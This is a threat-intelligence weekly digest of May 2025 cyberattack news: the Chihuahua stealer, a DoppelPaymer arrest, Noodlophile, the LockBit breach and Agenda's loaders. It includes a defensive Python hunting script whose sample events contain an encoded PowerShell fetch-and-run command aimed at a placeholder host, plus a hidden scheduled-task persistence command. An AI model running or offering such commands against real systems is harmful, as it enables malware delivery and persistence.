Chihuahua stealer

Tags: Threat intelligence
14 May 2025

Weekly Summary Cyberattacks May 8-14

Chihuahua Stealer, a PowerShell and .NET infostealer, discovered

A new infostealer called Chihuahua Stealer has been detected. First identified after a Reddit post on April 9, it spreads via a Google Drive document that lures the user into running an obfuscated PowerShell script. The infection unfolds in several stages and establishes persistence through scheduled tasks that check for marker files and fetch additional payloads from fallback domains. The core payload, written in .NET, steals data from browsers and cryptocurrency wallet extensions. The harvested data is compressed into a file with a ".chihuahua" extension, encrypted with AES-GCM via native Windows APIs, and exfiltrated over HTTPS to a remote server. Finally, the malware cleans up its artifacts to hinder detection.
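The chain described above (hidden, policy-bypassing PowerShell with an encoded command, a scheduled task that re-launches PowerShell, and a ".chihuahua" archive written to disk) is what a defender would hunt for in endpoint telemetry. The script below is an added example, not code from the page or from any vendor report. It decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text) and applies three simple rules to a handful of constructed Sysmon-style events; the event shape, field names, task name, file path and the example.invalid URL are all assumptions made for illustration.

```python
import base64
import re
from typing import Optional

# Constructed sample telemetry in a Sysmon-like shape (EventID 1 = process
# create, 11 = file create). Field names and values are assumptions; the URL
# is a placeholder, not a real stager.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(STAGE1.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -w hidden -ep bypass -enc {ENCODED}"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'schtasks.exe /create /sc minute /mo 1 /tn "Updater" '
                    '/tr "powershell -w hidden -ep bypass -File C:\\Users\\Public\\u.ps1"'},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\k2x9.chihuahua"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},  # benign admin use
    {"EventID": 11, "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},  # benign file write
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Download-cradle verbs that typically appear in a first-stage script.
CRADLE = re.compile(r"(?i)\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|"
                    r"net\.webclient|start-bitstransfer)\b")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), if present."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_stager_indicators(event: dict) -> list:
    """Name each stager trait present on a PowerShell process-create event."""
    if event.get("EventID") != 1 or not event.get("Image", "").lower().endswith("powershell.exe"):
        return []
    cmd = event.get("CommandLine", "")
    found = []
    if re.search(r"(?i)(?<!\S)-w(?:indowstyle)?\s+hidden", cmd):
        found.append("hidden_window")
    if re.search(r"(?i)(?<!\S)-e(?:xecutionpolicy|p)?\s+bypass", cmd):
        found.append("execpolicy_bypass")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        found.append("encoded_command")
        if CRADLE.search(decoded):
            found.append("download_cradle")
    elif CRADLE.search(cmd):
        found.append("download_cradle")
    return found


def hunt(events: list) -> list:
    """Return (rule, event_index) pairs for events matching the described chain."""
    hits = []
    for i, ev in enumerate(events):
        # Require at least two stager traits so plain "powershell -Command" does not fire.
        if len(powershell_stager_indicators(ev)) >= 2:
            hits.append(("powershell_obfuscated_stager", i))
        cmd = ev.get("CommandLine", "").lower()
        if (ev.get("EventID") == 1 and ev.get("Image", "").lower().endswith("schtasks.exe")
                and "/create" in cmd and "powershell" in cmd):
            hits.append(("schtasks_powershell_persistence", i))
        if ev.get("EventID") == 11 and ev.get("TargetFilename", "").lower().endswith(".chihuahua"):
            hits.append(("chihuahua_archive_written", i))
    return hits


if __name__ == "__main__":
    for rule, idx in hunt(SAMPLE_EVENTS):
        print(f"{rule}: event {idx} -> {SAMPLE_EVENTS[idx].get('CommandLine') or SAMPLE_EVENTS[idx].get('TargetFilename')}")
```

The file-extension rule is the most brittle of the three (an operator can rename the archive at any time); the encoded-command decoder and the schtasks-to-PowerShell rule survive such cosmetic changes and are worth keeping even after this particular family fades.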

Suspect arrested in Moldova for DoppelPaymer ransomware cyberattacks   

Authorities in Moldova have arrested a 45-year-old man accused of involvement in attacks using the DoppelPaymer ransomware, which hit Dutch organizations in 2021. The arrest, carried out on May 6, included searches of his home and vehicle, where electronic devices, €84,800 in cash, and other relevant items were seized. The detainee, a foreign national, is linked to an attack on the Netherlands Research Council (NWO) that caused around 4.5 million euros in damage and forced the shutdown of its grant application system. Moldova has opened proceedings for his extradition to the Netherlands. The action is part of a joint operation between Moldova and the Netherlands within a wider investigation into the DoppelPaymer group, responsible for multiple attacks on businesses and critical infrastructure since 2019.

New fake AI video generation tools spread Noodlophile malware   

Cybersecurity researchers have uncovered a new malicious campaign that uses fake AI video generators to distribute a malware called Noodlophile. Websites with appealing names such as "Dream Machine", promoted in Facebook groups, offer to generate AI videos from user-uploaded files but instead deliver an archive containing a malicious executable disguised as a video. The executable, a modified copy of a legitimate video editor, kicks off an infection chain that ends in the execution of Noodlophile Stealer. The stealer harvests credentials, cookies, tokens and cryptocurrency wallets from browsers and exfiltrates the data through a Telegram bot. According to the researchers, the malware is of Vietnamese origin and is sold on dark web forums as a service. In some cases it is bundled with the XWorm trojan, extending its spying capabilities.

New blow to LockBit ransomware group after massive data breach   

The LockBit ransomware group has suffered a major data breach after its dark web affiliate panel was hacked. Every admin page of the panel was replaced with the message "Don't do crime CRIME IS BAD xoxo from Prague" and a link to a downloadable MySQL database dump. The dump, analyzed by researchers, contains nearly 60,000 bitcoin addresses, build configurations, names of targeted companies, and more than 4,400 negotiation messages exchanged with victims between December and April. Plaintext credentials of 75 panel users were also leaked, including passwords as weak as 'Weekendlover69'. The operator 'LockBitSupp' confirmed the incident but claimed that no private keys were leaked and no information was lost. The perpetrator is still unknown, although the message matches one used in a recent defacement of the Everest group's site. The breach is another blow to LockBit, which had already been partially dismantled in 2024 by the law-enforcement Operation Cronos.

Agenda Ransomware Group Enhances Arsenal with SmokeLoader and NETXLOADER   

Cybersecurity researchers report that the Agenda ransomware group, also known as Qilin, has added two malware loaders, SmokeLoader and NETXLOADER, to its toolkit. SmokeLoader is a long-established loader used to deliver a wide range of payloads, while NETXLOADER is a newer tool that injects malicious code into legitimate processes to aid evasion and persistence. The adoption of these tools shows Agenda's continued investment in its delivery mechanisms and in complicating detection. The group continues to target organizations across a range of sectors, underscoring the need for layered defenses that cover loader activity, not just the final ransomware payload.